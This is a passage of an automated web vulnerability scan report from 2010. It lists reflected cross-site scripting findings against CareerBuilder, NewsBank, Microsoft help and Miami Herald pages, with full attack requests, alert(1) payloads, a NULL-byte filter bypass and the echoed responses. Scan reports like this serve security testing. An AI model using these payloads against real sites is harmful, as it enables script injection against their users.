Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mf.ic/Florida_Miami/?lr=cbcb_mh2a78f'-alert(1)-'2c61d5b8e89&SiteID=cbcb_mh043 HTTP/1.1
Host: manufacturing.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 200489
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=31c8a9168a324c7db86d4832c28fda33-343071021-R7-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650DB6131B087A38A47B2E951820C5AC2CC5B2E82D3899943FBB7C47BC6A3F46E8B7A2166EDA22B2B1E; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:30:21 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:45:21 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL7
Date: Sun, 14 Nov 2010 22:30:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh2a78f'-alert(1)-'2c61d5b8e89&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.184. http://manufacturing.careerbuilder.com/mf.ic/Florida_Miami/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://manufacturing.careerbuilder.com
Path:   /mf.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f03f"%20a%3db%206b20fd7d40 was submitted in the lr parameter. This input was echoed as 4f03f" a=b 6b20fd7d40 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mf.ic/Florida_Miami/?lr=cbcb_mh4f03f"%20a%3db%206b20fd7d40&SiteID=cbcb_mh043 HTTP/1.1
Host: manufacturing.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 198344
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=8304050d6cf8407c811aa470d8e5f6d1-343070998-R4-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650B9DECA71415B4B344AA0626B957297F05C7D9A2F0F944124DD6C01CE730577B3DB3E25B34023B418; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:57 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:57 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL4
Date: Sun, 14 Nov 2010 22:29:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mh4f03f" a=b 6b20fd7d40" />
...[SNIP]...

2.185. http://nl.newsbank.com/nl-search/we/Archives [p_theme parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nl.newsbank.com
Path:   /nl-search/we/Archives

Issue detail

The value of the p_theme request parameter is copied into the HTML document as plain text between tags. The payload %008ed0e<script>alert(1)</script>d58813ac31b was submitted in the p_theme parameter. This input was echoed as 8ed0e<script>alert(1)</script>d58813ac31b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /nl-search/we/Archives?p_multi=EN|&p_product=EN&p_theme=realcities2%008ed0e<script>alert(1)</script>d58813ac31b&p_action=search&p_maxdocs=200&s_site=miami&s_trackval=MH&p_text_search-0= HTTP/1.1
Host: nl.newsbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:31:11 GMT
Server: Apache/1.3.26 (Unix) mod_gzip/1.3.26.1a mod_wsgi/1.0 Python/2.5.1 ApacheJServ/1.1.2 mod_jk/1.2.23
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
WWW-Authenticate: Basic realm="NewsLibrary"
Set-Cookie: JServSessionIdnewslib=1vo0qd5xz1.JS58a; path=/
Connection: close
Content-Type: text/html
Content-Length: 247

com.newsbank.util.NException: misc stylesheet processing on /raid/excal-common/stylesheets/Archives/realcities2.8ed0e<script>alert(1)</script>d58813ac31b/error.xslt: com.newsbank.xml.NXSLCacheException: getXSLTSheet: java.lang.NullPointerException

2.186. http://nonprofit.careerbuilder.com/np.ic/Florida_Miami/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://nonprofit.careerbuilder.com
Path:   /np.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44c59"%20a%3db%205eb6f2d6390 was submitted in the lr parameter. This input was echoed as 44c59" a=b 5eb6f2d6390 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /np.ic/Florida_Miami/?lr=cbcb_mh44c59"%20a%3db%205eb6f2d6390&SiteID=cbcb_mh044 HTTP/1.1
Host: nonprofit.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 192802
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=c08c85f0ab084f8f980cf516a8699a49-343071164-wr-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650B3A9AEF8176FA9165F0DC617B8A41DBB4614ECA2B5399C5087ECC6D8DD45EEFD09EDB9641CDD258A; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:32:43 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:47:44 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR28
Date: Sun, 14 Nov 2010 22:32:44 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mh44c59" a=b 5eb6f2d6390" />
...[SNIP]...

2.187. http://nonprofit.careerbuilder.com/np.ic/Florida_Miami/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nonprofit.careerbuilder.com
Path:   /np.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c4b0'-alert(1)-'e1cb828b728 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /np.ic/Florida_Miami/?lr=cbcb_mh7c4b0'-alert(1)-'e1cb828b728&SiteID=cbcb_mh044 HTTP/1.1
Host: nonprofit.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 193671
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=d3514a0dd6ee4dd987d69599015f5627-343071191-w2-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC65082533C0B6A15006E7BC1B42D76A4BDB01E298DFB14A0354963421DD88C93932E779431AB1D93ACE6; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:33:11 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:48:11 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR2
Date: Sun, 14 Nov 2010 22:33:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh7c4b0'-alert(1)-'e1cb828b728&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.188. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-US/bing/ff808535.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 125d3"><script>alert(1)</script>70febfd0c58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-US/bing/ff808535.aspx?125d3"><script>alert(1)</script>70febfd0c58=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAAA1BwAA6Vf9zWhAqhs9UEWZy8ydVA!!&M=1; domain=.microsoft.com; expires=Wed, 14-Nov-2040 23:27:59 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 14-Nov-2040 23:28:00 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:27:59 GMT
Content-Length: 43681


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help&body=http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx?125d3"><script>alert(1)</script>70febfd0c58=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

2.189. http://pd.miami.com/sp [aff parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pd.miami.com
Path:   /sp

Issue detail

The value of the aff request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7cefd'><script>alert(1)</script>08ecacb8cdf was submitted in the aff parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sp?skin=&aff=11097cefd'><script>alert(1)</script>08ecacb8cdf&keywords=&submit=Go HTTP/1.1
Host: pd.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: userId=293008834; Expires=Mon, 14-Nov-2011 22:32:00 GMT; Path=/
Set-Cookie: JSESSIONID=38FCB2DA207BCBB9D35AA629320C5968; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Sun, 14 Nov 2010 22:32:02 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>MiamiHerald.com Search</title>
       <!-- No include URL entered -->
       <
...[SNIP]...
<a class='on-page' href='/sp?aff=11097cefd'><script>alert(1)</script>08ecacb8cdf&skin=&submit=Go&keywords=&start=1'>
...[SNIP]...

2.190. http://pd.miami.com/sp [keywords parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pd.miami.com
Path:   /sp

Issue detail

The value of the keywords request parameter is copied into the HTML document as plain text between tags. The payload a29ab<script>alert(1)</script>7d509c47700 was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sp?skin=&aff=1109&keywords=a29ab<script>alert(1)</script>7d509c47700&submit=Go HTTP/1.1
Host: pd.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: userId=293008847; Expires=Mon, 14-Nov-2011 22:32:03 GMT; Path=/
Set-Cookie: JSESSIONID=E2FDD3163D3ACCA75F1716C8CD671BE4; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Sun, 14 Nov 2010 22:32:02 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
   <head>
       <title>a29ab&lt;script&gt;a
...[SNIP]...
<span class="bold-font">a29ab<script>alert(1)</script>7d509c47700</span>
...[SNIP]...

2.191. http://pd.miami.com/sp [keywords parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pd.miami.com
Path:   /sp

Issue detail

The value of the keywords request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f284b"><script>alert(1)</script>34bce5358bd was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sp?skin=&aff=1109&keywords=f284b"><script>alert(1)</script>34bce5358bd&submit=Go HTTP/1.1
Host: pd.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: userId=293008843; Expires=Mon, 14-Nov-2011 22:32:03 GMT; Path=/
Set-Cookie: JSESSIONID=4C6CA1184F2F4D6429BCFB2F707F8A1B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Sun, 14 Nov 2010 22:32:02 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
   <head>
       <title>f284b&quot;&gt;&lt;s
...[SNIP]...
<input id="keywords" type="text" name="keywords" value="f284b"><script>alert(1)</script>34bce5358bd" >
...[SNIP]...

2.192. http://pd.miami.com/sp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pd.miami.com
Path:   /sp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8af6"><script>alert(1)</script>0b02c8bd5b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sp?e8af6"><script>alert(1)</script>0b02c8bd5b8=1 HTTP/1.1
Host: pd.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: userId=293008771; Expires=Mon, 14-Nov-2011 22:31:45 GMT; Path=/
Set-Cookie: JSESSIONID=5F4E76F4A7975B2D912E6DDDABD693EC; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Sun, 14 Nov 2010 22:31:53 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>MiamiHerald.com Search</title>
       <!-- No include URL entered -->
       <
...[SNIP]...
<a href="http://pd.miami.com/sp?skin=&aff=1100&keywords=&e8af6"><script>alert(1)</script>0b02c8bd5b8=1&">
...[SNIP]...

2.193. http://pd.miami.com/sp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pd.miami.com
Path:   /sp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5a68d'><script>alert(1)</script>2a247e32006 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sp?5a68d'><script>alert(1)</script>2a247e32006=1 HTTP/1.1
Host: pd.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: userId=293008817; Expires=Mon, 14-Nov-2011 22:31:57 GMT; Path=/
Set-Cookie: JSESSIONID=623F113F2B767DD27302847C91959B89; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Sun, 14 Nov 2010 22:31:58 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>MiamiHerald.com Search</title>
       <!-- No include URL entered -->
       <
...[SNIP]...
<a class='on-page' href='/sp?aff=&5a68d'><script>alert(1)</script>2a247e32006=1&5a68d'>
...[SNIP]...

2.194. http://pd.miami.com/sp [skin parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pd.miami.com
Path:   /sp

Issue detail

The value of the skin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abb94"><script>alert(1)</script>7c71531038e was submitted in the skin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sp?skin=abb94"><script>alert(1)</script>7c71531038e&aff=1109&keywords=&submit=Go HTTP/1.1
Host: pd.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: userId=293008725; Expires=Mon, 14-Nov-2011 22:31:36 GMT; Path=/
Set-Cookie: JSESSIONID=5E3C42A7A8E3B1A057FB8D90D6456A77; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Sun, 14 Nov 2010 22:31:36 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>Local Directory > Miami, FL > Miami Herald</title>
       
           
               <link rel="StyleSheet" href="/sf_frameworks/yp/css/screen.jsp?skin=abb94"><script>alert(1)</script>7c71531038e" type="text/css"/>
...[SNIP]...

2.195. http://pd.miami.com/sp [skin parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pd.miami.com
Path:   /sp

Issue detail

The value of the skin request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bd1a7'><script>alert(1)</script>6a21073105a was submitted in the skin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sp?skin=bd1a7'><script>alert(1)</script>6a21073105a&aff=1109&keywords=&submit=Go HTTP/1.1
Host: pd.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: userId=293008731; Expires=Mon, 14-Nov-2011 22:31:38 GMT; Path=/
Set-Cookie: JSESSIONID=4B5FA7C0F6A9F5500F6AB02D2769F0E3; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Sun, 14 Nov 2010 22:31:38 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>Local Directory > Miami, FL > Miami Herald</title>
       
           
               <li
...[SNIP]...
<input type='hidden' name='skin' value='bd1a7'><script>alert(1)</script>6a21073105a'/>
...[SNIP]...

2.196. http://retail.careerbuilder.com/rt.ic/Florida_Miami/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://retail.careerbuilder.com
Path:   /rt.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33483"%20a%3db%209e634a2ad91 was submitted in the lr parameter. This input was echoed as 33483" a=b 9e634a2ad91 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /rt.ic/Florida_Miami/?lr=cbcb_mh33483"%20a%3db%209e634a2ad91&SiteID=cbcb_mh045 HTTP/1.1
Host: retail.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 196457
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=4457d6fa83344a578fb8e489d659276d-343071183-XE-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650A3EF5BFA08B152085FF5EB5256808D63408F4E9A5B5C6850C79095234B5F2A3EDC57BB78FC777114; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:33:03 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:48:03 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR45
Date: Sun, 14 Nov 2010 22:33:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mh33483" a=b 9e634a2ad91" />
...[SNIP]...

2.197. http://retail.careerbuilder.com/rt.ic/Florida_Miami/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://retail.careerbuilder.com
Path:   /rt.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59826'-alert(1)-'b0e1b29c015 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rt.ic/Florida_Miami/?lr=cbcb_mh59826'-alert(1)-'b0e1b29c015&SiteID=cbcb_mh045 HTTP/1.1
Host: retail.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 196717
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=cb054ad5c25e4f7c8fe17a48f1dee91c-343071214-wc-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC65028A8C4478E20C154059119D0921DD53C8E8B668187685AE991E973471DDFBE77BEACC4A7A1B8CD36; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:33:33 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:48:34 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR13
Date: Sun, 14 Nov 2010 22:33:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh59826'-alert(1)-'b0e1b29c015&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.198. http://sales-marketing.careerbuilder.com/sm.ic/Florida_Miami/ [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales-marketing.careerbuilder.com
Path:   /sm.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b023'-alert(1)-'384c97332ed was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sm.ic/Florida_Miami/?lr=cbcb_mh5b023'-alert(1)-'384c97332ed&SiteID=cbcb_mh046 HTTP/1.1
Host: sales-marketing.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 199874
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
